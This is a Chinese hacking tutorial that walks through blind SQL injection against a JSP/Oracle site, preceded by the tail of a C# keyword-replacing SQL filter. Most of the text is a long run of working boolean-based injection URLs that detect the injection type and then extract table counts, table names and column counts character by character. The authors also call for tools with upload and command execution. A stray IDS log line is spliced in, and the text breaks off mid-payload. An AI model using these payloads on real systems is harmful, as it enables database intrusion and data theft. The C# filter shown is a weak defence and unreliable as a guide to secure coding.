ReturnValue = Rx.IsMatch(LowerStr, 0);
}
return ReturnValue;
}
///
/// 过滤 Sql 语句字符串中的注入脚本
///
///
///
public static string SqlFilter(string str)
{
str = str.Replace(“””, “‘’”);
//单引号替换成两个单引号
str = str.Replace(“‘”, “‘”);
//半角封号替换为全角封号,防止多语句执行
str = str.Replace(“;”, “;”);
//半角括号替换为全角括号
str = str.Replace(“(“, “(”);
str = str.Replace(“)”, “)”);
///////////////要用正则表达式替换,防止字母大小写得情况////////////////////
//去除执行存储过程的命令关键字
str = str.Replace(“Exec”, “”);
str = str.Replace(“Execute”, “”);
//去除系统存储过程或扩展存储过程关键字
str = str.Replace(“xp_”, “x p_”);
str = str.Replace(“sp_”, “s p_”);
//防止16进制注入
str = str.Replace(“0x”, “0 x”);
return str;
}
}
}
大家好 ,我们是pt007和solaris7,QQ:7491805/564935,欢迎高手前来交流:),
首先感谢华仔和他的朋友Hotkey为大家开发的cnsafersi 注入工具,没有这个工具就没有本文,HEHE,本文是对cnsafersi 注入工具抓包后所获得的数据进行了分析和整理,文章写的比较仓促,有不足之处欢迎同行指正。另外希望有高手开发出功能更加强大的JSP注入程序,cnsafersi目前仅有select的功能,建议新的JSP注入工具中能加入insert/delete/update/backup/上传/执行系统命令等功能,可以参考NBSI的功能进行开发。参考文章:《如何开发CnSaferSI》。
首先介绍本文中所使用的工具之JSP注入利器:华仔和他的朋友Hotkey开发的cnsafersi,关于使用方法近期我会写一个详细的使用教程:
下面以上图中的AD表为例来说明JSP+ORACLE注入的过程:
1、 判断注入类型(数字型还是字符型)
字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)
www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)
www.test.net/index_kaoyan_view.jsp?id=117 And user
www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1
www.test.net/index_kaoyan_view.jsp?id=117' And user www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '%25'=' www.test.net/index_kaoyan_view.jsp?id=117' And user www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1 www.test.net/index_kaoyan_view.jsp?id=117) And user www.test.net/index_kaoyan_view.jsp?id=117') And user>char(0) And (' ')=(' www.test.net/index_kaoyan_view.jsp?id=117') And user www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97) www.test.net/index_kaoyan_view.jsp?id=117 And str(98) www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '1'='1 www.test.net/index_kaoyan_view.jsp?id=117' And str(98) www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'=' www.test.net/index_kaoyan_view.jsp?id=117' And user www.test.net/index_kaoyan_view.jsp?id=117' And str(98) www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1 www.test.net/index_kaoyan_view.jsp?id=117) And str(98) www.test.net/index_kaoyan_view.jsp?id=117') And str(98)>str(97) And (' ')=(' www.test.net/index_kaoyan_view.jsp?id=117') And str(98) 出现正常的页面: www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0) www.test.net/index_kaoyan_view.jsp?id=117 And USER 2、 猜解表数量和表名 数据库数量为3: www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0) 以下为猜解数据表数量 数据表第一位为:1 www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) 数据表第二位为:3 www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 数据表第三位为:1 www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) 共有131个数据表,见上图。 以下为猜解表名称: 以下为判断第一个表的长度为:2 www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) 以下为判断第一个表的第一位值为:A www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1)) 以下为判断第一个表AD的第二位值为:D www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) 以下为判断第二个表的表ADER的表名长度为:4 www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) 以下为判断第二个表ADER第一位的值为:A www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1)) 以下为判断第二个表ADER第二位的值为:D www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1)) 以下为判断第二个表ADER第三位的值为:E www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1)) 以下为判断第二个表ADER第四位的值为:R www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1)) 以下为判断第三个表的表名长度为: www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) 3、 猜解列名长度和列名: a) 以下为猜解字段长度为:2位 www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0) www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0) www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0) www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0) www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0) ? 列名长度为:10位以上 以下猜解列名的长度的第一位为:1(十位) www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1)) 以下猜解列名长度的第二位为:0(个位) www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) Informational 10/12/2005 15:03:25 Suspect event: ICMP Time Exceeded (>1 for 1 seconds) www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 